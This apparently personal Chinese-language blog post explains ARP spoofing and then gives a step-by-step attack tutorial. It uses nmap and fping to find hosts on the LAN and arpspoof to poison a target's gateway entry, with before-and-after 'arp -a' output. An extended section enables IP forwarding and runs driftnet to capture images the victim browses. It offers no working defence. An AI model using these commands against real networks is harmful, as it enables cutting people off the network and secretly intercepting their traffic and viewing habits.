温馨提示:本文最后更新于
2024-10-04 20:23:17
,某些文章具有时效性,若有错误或已失效,请联系星雨站长!前言
本教程所涉及的一些工具暂时就不分享出来了,主要还是怕有的小伙伴拿去恶搞,愿意折腾就去搞kali,类似的工具有很多,请自行查找。其次,目前还未找到相关的解决方案,网上给出的解决方案大概都看了一下,大多数都不可靠!
arp攻击原理
ARP(地址解析协议)攻击的原理是利用了ARP协议的信任机制及其无认证性。ARP协议主要用于在局域网内将IP地址映射为MAC地址。具体来说,ARP攻击通过伪造ARP应答包,将攻击者的MAC地址映射到合法的IP地址上,从而欺骗目标设备,使其将数据包发送给攻击者。
举个例子
1.首先我们去目标机器上通过arp -a
查看路由器的mac地址
S C:\WINDOWS\system32> arp -a
接口: 192.168.0.101 --- 0x12
Internet 地址 物理地址 类型
192.168.0.1 30-fc-68-f0-45-5f 动态
192.168.0.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态
可以看到现在的mac地址为30-fc-68-f0-45-5f
2.接着去kali上对目标机器进行arp欺骗
3.这时你就会发现目标机器上的路由器mac地址已经了发生更改
PS C:\WINDOWS\system32> arp -a
接口: 192.168.0.101 --- 0x12
Internet 地址 物理地址 类型
192.168.0.1 00-0c-29-26-1b-ab 动态
192.168.0.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态
而这个mac地址刚好是kali的mac地址
简单说就是:
- ARP攻击是攻击者通过伪装,让目标设备把攻击者当成网络中的重要设备(比如路由器)。
- 攻击者假装自己的设备是路由器,并告诉目标设备“我是路由器”,然后目标设备就会把数据发给攻击者,而不是发给真正的路由器。
- 这样,攻击者就能偷看到、篡改甚至阻止目标设备的网络数据。
所以,ARP攻击的关键不是伪装成目标设备,而是伪装成目标设备要通信的网络设备,比如路由器或网关。
攻击教程
1.首先通过 route -n
获取局域网网关
可以看到,我当前所在的局域网网关为192.168.0.1
2.通过nmap获取局域网存活的主机
也可以通过fping -g 网段/24
的方式获取局域网存活的主机
3.通过ifconfig
来查看自己的网卡信息
4.接着使用arpspoof -i 自己网卡信息 -t 目标IP -r 网关
对目标ip进行攻击
这时你就会发现目标设备已经无法正常上网了!
扩展教程
开启IP转发
echo 1 >/proc/sys/net/ipv4/ip_forward
进行arp攻击
arpspoof -i eth0 -t targetIP -r gateway(具体参考上面)
新建一个窗口,安装driftnet
driftnet可用于获取目标IP游览的图片,在root模式下输入如下命令
apt-get update
apt-get install driftnet
安装完成后,运行driftnet -i 你的网卡
driftnet -i eth0
这时目标机器所浏览的图片都会显示出来。(经测试,并不是所有图片都能显示出来)
使用Windows进行攻击
工具一:arp欺骗工具
工具二:ArpSpoof
© 版权声明
本文是原创文章,采用CC BY-NC-SA 4.0协议,完整转载请注明来自星雨の博客
THE END